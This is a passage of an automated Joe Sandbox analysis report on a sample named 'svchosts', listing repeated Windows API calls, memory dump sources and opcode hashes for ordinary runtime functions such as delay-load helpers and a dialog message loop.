                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                      • String ID:
                                                                      • API String ID: 1915507550-0
                                                                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                                      • Instruction ID: 6ea909b38747dfe6847297bb0ab7c51563de0d0090ac53d16dce695268032648
                                                                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                                      • Instruction Fuzzy Hash: B4D0A73023420D7FDF40FE728C02A7A7BA8EB02300F004025BC0886141ED71DEB0A671
                                                                      APIs
                                                                      • GetFileType.KERNELBASE(000000FF,00299887), ref: 00299995
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      • Opcode ID: 619879bd8fe503acd62a3da562285812af8399e6f34c4982be7fb6f96426f50a
                                                                      • Instruction ID: 77306a2704e48d90a485adab42ff34c2efc5160b6bcfc92ebe942d1f3bde48a7
                                                                      • Opcode Fuzzy Hash: 619879bd8fe503acd62a3da562285812af8399e6f34c4982be7fb6f96426f50a
                                                                      • Instruction Fuzzy Hash: 13D0123203214295AF659E3C9D094997751DB83376B78CAACD025C40A1D723C893F541
                                                                      APIs
                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 002AD43F
                                                                        • Part of subcall function 002AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AAC85
                                                                        • Part of subcall function 002AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AAC96
                                                                        • Part of subcall function 002AAC74: IsDialogMessageW.USER32(00010450,?), ref: 002AACAA
                                                                        • Part of subcall function 002AAC74: TranslateMessage.USER32(?), ref: 002AACB8
                                                                        • Part of subcall function 002AAC74: DispatchMessageW.USER32(?), ref: 002AACC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                      • String ID:
                                                                      • API String ID: 897784432-0
                                                                      • Opcode ID: 0350dee72f632dce95e8363fe95adefb4795f2e11c111ad724cfb62393f3bc9c
                                                                      • Instruction ID: fbe91d89fd96ff1d1c65e6b2bd45880d94448e8be03e8b16e45a9d3fceb374cd
                                                                      • Opcode Fuzzy Hash: 0350dee72f632dce95e8363fe95adefb4795f2e11c111ad724cfb62393f3bc9c
                                                                      • Instruction Fuzzy Hash: C1D09E31154300ABDA512B51DE06F1F7AE6AB89B04F404555B348740B28A629D30DF16
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 3943ac5f5d812ade9903c959407f9f9682eeff415b52b422504f5e29dc73d626
                                                                      • Instruction ID: 36ce5a3af4b142c7a38592a68b4e41dd876646ae0999dd4a146bf743badcd99e
                                                                      • Opcode Fuzzy Hash: 3943ac5f5d812ade9903c959407f9f9682eeff415b52b422504f5e29dc73d626
                                                                      • Instruction Fuzzy Hash: 16B0129527C505AE310861046C4BE3B031CD4C3B12330452EF10FD28C1DC805C390D31
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 03115e71acfd9c09e478e7cad6104f33ee980195fd12362119ae5d0f4d08ce69
                                                                      • Instruction ID: 7ec2d06ac1b4d0957d417019975b551c1abeba0cf03cd6f41e2161ec6948bdb6
                                                                      • Opcode Fuzzy Hash: 03115e71acfd9c09e478e7cad6104f33ee980195fd12362119ae5d0f4d08ce69
                                                                      • Instruction Fuzzy Hash: 62B0129227D401AE310861046C0BE37031CC4C3B12330C52EF50FD2AC1DD805C3E0831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: cabd8eea1bb227240245a921781a56018ce044cde71eb2d8b60b05d4681e4140
                                                                      • Instruction ID: 89bc8923d857a0d57260385a76ebbce4400e3845baad24cbbb2f2af1e4b7f653
                                                                      • Opcode Fuzzy Hash: cabd8eea1bb227240245a921781a56018ce044cde71eb2d8b60b05d4681e4140
                                                                      • Instruction Fuzzy Hash: 99B09295278601AE21082100685AD3B0218C483B123204A2AB10BE1881D8805C694831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: b6abf436f7bff9b1501584cca42ac9625d7d9552420dbf535247f4bf935450bf
                                                                      • Instruction ID: 882bbf2da681c000323aaaa19a31c7411210b9c041d5747f24ad016eb815dbd5
                                                                      • Opcode Fuzzy Hash: b6abf436f7bff9b1501584cca42ac9625d7d9552420dbf535247f4bf935450bf
                                                                      • Instruction Fuzzy Hash: 08B012A127C501AE314861046D0BF37031CC4C3B12330462EF10FD28C1DC805C790831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: f0f6ddb0c048b0a08e444033d603b147e387551166f18c75c751f125faf06e73
                                                                      • Instruction ID: ee988d7a504a84265a7edfe87a83306d586991bff8936618568e4edfee93d104
                                                                      • Opcode Fuzzy Hash: f0f6ddb0c048b0a08e444033d603b147e387551166f18c75c751f125faf06e73
                                                                      • Instruction Fuzzy Hash: 04B012A127C401AE310C61056D0BF37031CC4C3B12330452EF10FD28C1DC805C390831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 1468b4c39286334bcb224cb2dc0cfcb215b109d3c3916407ae6ec5bb5af09bc9
                                                                      • Instruction ID: ede6b93eabaa0dec7c3a9f07fc8ebbc97c9a5342bdb0b512d39e49f3470d02e5
                                                                      • Opcode Fuzzy Hash: 1468b4c39286334bcb224cb2dc0cfcb215b109d3c3916407ae6ec5bb5af09bc9
                                                                      • Instruction Fuzzy Hash: 7DB012A127C401AF310C61046E0BF37031CC4C3B12330452EF10FD28C1DC805D3A0831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: c4b1384f95b506e72d6dadf572ac2e9f30c82d3456eb3b4c33a750b21508712c
                                                                      • Instruction ID: dd217758983ba01e9bdbcc35ab55140f7619660a6293a5979624e8985a216d07
                                                                      • Opcode Fuzzy Hash: c4b1384f95b506e72d6dadf572ac2e9f30c82d3456eb3b4c33a750b21508712c
                                                                      • Instruction Fuzzy Hash: 4CB09291278401AE21086104690BE37021CC483B12320852AB10BD2A81D980583E0831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 9e06e72dcc36bc50a9ba49a5271f2179cbd2d56ce5de03ed99b5e19e8748d5f8
                                                                      • Instruction ID: 8dd1e3b5828995508e76c47fe927e2f990ee500486a5ed6d4298d9833f6a5be2
                                                                      • Opcode Fuzzy Hash: 9e06e72dcc36bc50a9ba49a5271f2179cbd2d56ce5de03ed99b5e19e8748d5f8
                                                                      • Instruction Fuzzy Hash: E9B0129127C501AE314861046C0BE37031CC4C3B12330862EF10FD2AC1DD805CBE0831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 9e9cd8c54479304464a6cb45b904d92aa1663b71b7a983f6db106d8dde1566e6
                                                                      • Instruction ID: 8d8ea9e7f9f374ea4f41bc7619a3cd23f6b5acf65102b62342eeb00c92abfc71
                                                                      • Opcode Fuzzy Hash: 9e9cd8c54479304464a6cb45b904d92aa1663b71b7a983f6db106d8dde1566e6
                                                                      • Instruction Fuzzy Hash: 5CB012A127D401AE310861046D0BF37031CC4C3B12330852FF50FD28C1DC805C390831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 55567da8c5c16732850c3e887658b3913dd3c91d3f91b187fd0db1e494767d7f
                                                                      • Instruction ID: 49f63fa7ed70c944d363860372e5a0a812d5ff732d55f81bf2f540f0790ae9bb
                                                                      • Opcode Fuzzy Hash: 55567da8c5c16732850c3e887658b3913dd3c91d3f91b187fd0db1e494767d7f
                                                                      • Instruction Fuzzy Hash: 3FB0129127D401AE310961146C0BE37035CC4C3B12330852EF60FD28C1DD805C390C31
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 60c08b91cdf3714604e225bca58cfd07aef3bae073243bcc4782a2997b3577f5
                                                                      • Instruction ID: a794614bc5aa73eeceb9b97bff92b1a4022864d79bed4114dafe6e4c7b066d4c
                                                                      • Opcode Fuzzy Hash: 60c08b91cdf3714604e225bca58cfd07aef3bae073243bcc4782a2997b3577f5
                                                                      • Instruction Fuzzy Hash: 8CB0129127D401AE310861046D0BE37035DC8C3B12730452EF10FD28C1DC805C390831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: ed3f9c261f0b32c51d5dea32316f269c19bc1993443f120fcc590a14c54c9469
                                                                      • Instruction ID: 259f60e96d1db44f0e99d2ed83f6f3ce20cd183684dbea4b15af2bad56586050
                                                                      • Opcode Fuzzy Hash: ed3f9c261f0b32c51d5dea32316f269c19bc1993443f120fcc590a14c54c9469
                                                                      • Instruction Fuzzy Hash: 3AB0129127E401AE310861046D0BE37031DC4C3B12730852EF50FD28C1DC805C390831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: a9fbd667b5bfc02d0745fd10be34e3dcda34c23c08cc4637882efef22923974f
                                                                      • Instruction ID: 014540335a6a7391789ec065b2962b9bed1eb35f3354059259be89939c2fcfea
                                                                      • Opcode Fuzzy Hash: a9fbd667b5bfc02d0745fd10be34e3dcda34c23c08cc4637882efef22923974f
                                                                      • Instruction Fuzzy Hash: 81B012A127D501AE314862046D0BE37031DC4C3B12730462EF10FD28C1DC805C790831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
